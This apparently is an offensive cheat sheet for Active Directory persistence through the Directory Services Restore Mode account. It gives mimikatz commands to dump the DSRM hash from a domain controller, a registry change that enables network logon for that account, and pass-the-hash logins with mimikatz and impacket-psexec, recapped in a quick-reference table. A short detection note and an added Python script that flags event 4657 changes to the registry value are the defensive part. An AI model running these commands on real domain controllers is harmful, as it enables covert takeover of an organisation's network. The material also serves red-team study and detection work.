
Overview

Every domain controller has a local Directory Services Restore Mode (DSRM) administrator account whose password is set during AD DS promotion. Its NTLM hash can be extracted from the DC's SAM and used to authenticate to the DC.

Get DSRM Password Hash

mimikatz # token::elevate
mimikatz # lsadump::sam
Look for the local Administrator account hash in the SAM output.

Enable Network DSRM Login

By default, the DSRM account can only log in while the DC is booted into DSRM. Change the registry value to allow network logon:
reg add "HKLM\System\CurrentControlSet\Control\Lsa" /v DsrmAdminLogonBehavior /t REG_DWORD /d 2

Value  Behavior
0      Only in DSRM boot (default)
1      When AD DS is stopped
2      Always (what we want)

Authenticate with DSRM Hash

mimikatz # sekurlsa::pth /domain:DC_HOSTNAME /user:Administrator /ntlm:DSRM_HASH /run:cmd.exe
impacket-psexec -hashes :DSRM_HASH ./Administrator@DC_IP
Use ./ (local), not DOMAIN/: the DSRM account is a local account, not a domain account.

Notes

  • DSRM password is rarely changed → long-term persistence
  • Local account — use .\Administrator or HOSTNAME\Administrator
  • Survives reboots
  • Requires the registry change above for remote (network) access
  • Detection: monitor the DsrmAdminLogonBehavior registry value (default 0)
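As an added example for the detection note above (not code from the original page), the following script evaluates Windows Security event 4657 (registry value modified) records and flags changes to DsrmAdminLogonBehavior under the Lsa key. It assumes object-access auditing is enabled with a SACL on that key so 4657 fires, and the records and their field layout are constructed samples.

```python
# Added detection example: flag 4657 records that set DsrmAdminLogonBehavior.
# Event records below are constructed samples, not real telemetry.
from dataclasses import dataclass
from typing import Optional

TARGET_VALUE = "DsrmAdminLogonBehavior"
LSA_KEY_SUFFIX = r"\system\currentcontrolset\control\lsa"

# Meaning of each value, as listed in the table above.
BEHAVIOR = {0: "only in DSRM boot (default)",
            1: "when AD DS is stopped",
            2: "always (network logon allowed)"}


@dataclass
class Alert:
    host: str
    actor: str
    old: Optional[int]
    new: int
    severity: str


def parse_reg_dword(raw: Optional[str]) -> Optional[int]:
    """Assumed formats: '0x00000002' or '2'; '-' or empty means no prior value."""
    if raw in (None, "", "-"):
        return None
    return int(raw, 16) if raw.lower().startswith("0x") else int(raw)


def evaluate_4657(event: dict) -> Optional[Alert]:
    """Return an Alert when a 4657 record sets DsrmAdminLogonBehavior to 1 or 2."""
    if event.get("EventID") != 4657:
        return None
    if event.get("ObjectValueName", "").lower() != TARGET_VALUE.lower():
        return None
    if not event.get("ObjectName", "").lower().endswith(LSA_KEY_SUFFIX):
        return None
    new = parse_reg_dword(event.get("NewValue"))
    if new is None or new == 0:
        return None  # reset to the default: no alert
    return Alert(event.get("Computer", "?"), event.get("SubjectUserName", "?"),
                 parse_reg_dword(event.get("OldValue")), new,
                 "high" if new == 2 else "medium")


def scan(events) -> list:
    return [a for a in map(evaluate_4657, events) if a is not None]


# Constructed sample records (parsed 4657 fields). Only the first should alert.
LSA = r"\REGISTRY\MACHINE\SYSTEM\CurrentControlSet\Control\Lsa"
SAMPLE_EVENTS = [
    {"EventID": 4657, "Computer": "DC01", "SubjectUserName": "admin", "ObjectName": LSA,
     "ObjectValueName": "DsrmAdminLogonBehavior", "OldValue": "-", "NewValue": "0x00000002"},
    {"EventID": 4657, "Computer": "DC01", "SubjectUserName": "svc", "ObjectName": LSA,
     "ObjectValueName": "LmCompatibilityLevel", "OldValue": "0x3", "NewValue": "0x5"},
    {"EventID": 4657, "Computer": "DC01", "SubjectUserName": "admin", "ObjectName": LSA,
     "ObjectValueName": "DsrmAdminLogonBehavior", "OldValue": "0x2", "NewValue": "0x0"},
]
```

In production the same check belongs in the SIEM rule that ingests 4657 from DCs; the value meanings map directly to the table above.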

Quick Reference

Task           Command
Get hash       mimikatz # lsadump::sam on the DC
Enable remote  Set DsrmAdminLogonBehavior = 2
Login          PtH with ./Administrator (local, not domain)